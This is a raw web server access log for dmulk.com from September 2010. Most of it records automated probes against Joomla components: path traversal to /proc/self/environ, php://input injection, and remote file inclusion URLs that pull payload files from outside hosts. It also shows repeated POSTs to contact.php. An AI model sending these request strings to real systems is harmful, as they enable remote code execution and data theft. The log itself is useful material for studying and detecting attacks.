180.151.249.166 - - [02/Sep/2010:13:02:45 -0700] "POST /logs/access_081230.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:02:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:02:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:03:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:03:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:04:00 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
89.108.64.232 - - [02/Sep/2010:13:04:14 -0700] "GET /logs/access_090507.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.232 - - [02/Sep/2010:13:04:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.232 - - [02/Sep/2010:13:04:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.232 - - [02/Sep/2010:13:05:10 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:06:14 -0700] "GET /logs/access_100820.log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:06:21 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.831" "www.dmulk.com"
207.58.129.29 - - [02/Sep/2010:13:06:22 -0700] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:06:35 -0700] "POST /logs/access_090602.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:06:59 -0700] "POST /logs/access_100201.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:07:27 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:07:28 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:07:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:07:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:08:17 -0700] "POST /logs/access_081230.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:08:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:08:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:13:09:50 -0700] "GET /logs/access_090113.log HTTP/1.0" 200 3291012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:11:00 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:11:00 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:11:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:11:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:11:45 -0700] "POST /logs/access_100611.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:11:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:13:12:41 -0700] "GET /new.php?theme_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:13:00 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:13:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:25 -0700] "GET /logs/access_100729.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:25 -0700] "GET /logs/access_100729.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:25 -0700] "GET /logs/access_100729.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:25 -0700] "POST /logs/access_100729.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:25 -0700] "GET /logs/access_100729.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:31 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0" 200 68577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:33 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:34 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68632 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:35 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:36 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68550 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:38 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:39 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:40 -0700] "GET /logs//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:41 -0700] "POST /logs//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:13:13:41 -0700] "GET /logs//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
64.157.4.41 - - [02/Sep/2010:13:13:48 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
60.251.189.134 - - [02/Sep/2010:13:13:50 -0700] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1 HTTP/1.0" 200 14353 "http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
60.251.189.134 - - [02/Sep/2010:13:14:07 -0700] "POST /blog/wp-comments-post.php HTTP/1.0" 302 1 "http://dmulk.com/blog/2008/08/28/occ-american-hondas-part-1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
67.195.114.243 - - [02/Sep/2010:13:14:39 -0700] "GET /logs/access_080722.log HTTP/1.0" 200 3362976 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:46 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:47 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:47 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:57 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:58 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:58 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
217.73.226.110 - - [02/Sep/2010:13:14:59 -0700] "POST /logs/access_100312.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:13:15:58 -0700] "GET /logs/access_100213.log//new.php?theme_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:13:15:59 -0700] "GET /new.php?theme_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:13:15:59 -0700] "GET /logs//new.php?theme_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.112.9 - - [02/Sep/2010:13:16:03 -0700] "GET /logs/access_091025.log//new.php?theme_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:13:16:06 -0700] "GET /bikes/WeSTOC07/?D=A HTTP/1.0" 200 955 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:13:16:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:13:16:13 -0700] "POST /logs/access_091104.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:13:16:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:13:16:31 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:16:40 -0700] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:16:40 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 200 68474 "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:16:45 -0700] "GET /logs/access_090120.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:17:02 -0700] "GET /logs/access_081125.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://wenda.zoomshare.com/files/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:17:03 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://wenda.zoomshare.com/files/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:11 -0700] "GET /logs/access_071222.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:13 -0700] "GET /logs/access_090120.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:13 -0700] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:17:13 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://wenda.zoomshare.com/files/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:17 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 200 68474 "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:38 -0700] "GET /logs/access_071222.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:17:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:17:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:13:17:48 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:58 -0700] "GET /logs/access_091002.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:17:59 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 200 68474 "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:18:03 -0700] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.121.191.57 - - [02/Sep/2010:13:18:36 -0700] "GET /logs/access_100309.log' HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:13:18:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:13:18:41 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:13:18:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:13:19:16 -0700] "GET /logs/access_100324.log%20%20/index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:13:19:21 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
211.202.2.26 - - [02/Sep/2010:13:19:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
211.202.2.26 - - [02/Sep/2010:13:19:38 -0700] "POST /logs/access_100722.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
211.202.2.26 - - [02/Sep/2010:13:19:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
211.202.2.26 - - [02/Sep/2010:13:19:41 -0700] "POST /logs/access_100723.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:13:20:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:13:20:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:13:20:23 -0700] "POST /logs/access_100705.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:13:20:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:13:20:26 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:13:20:26 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:13:20:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
92.62.196.66 - - [02/Sep/2010:13:20:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:13:20:44 -0700] "GET /logs/access_080831.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://wenda.zoomshare.com/files/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
124.115.0.101 - - [02/Sep/2010:13:21:01 -0700] "GET / HTTP/1.1" 200 68345 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:15 -0700] "POST /logs/access_080120.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:27 -0700] "POST /logs/access_080120.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:27 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
180.151.249.166 - - [02/Sep/2010:13:21:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:45 -0700] "GET /logs/access_100729.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:45 -0700] "GET /logs/access_100729.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:54 -0700] "GET /logs/access_100729.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:55 -0700] "POST /logs/access_100729.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:55 -0700] "GET /logs/access_100729.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
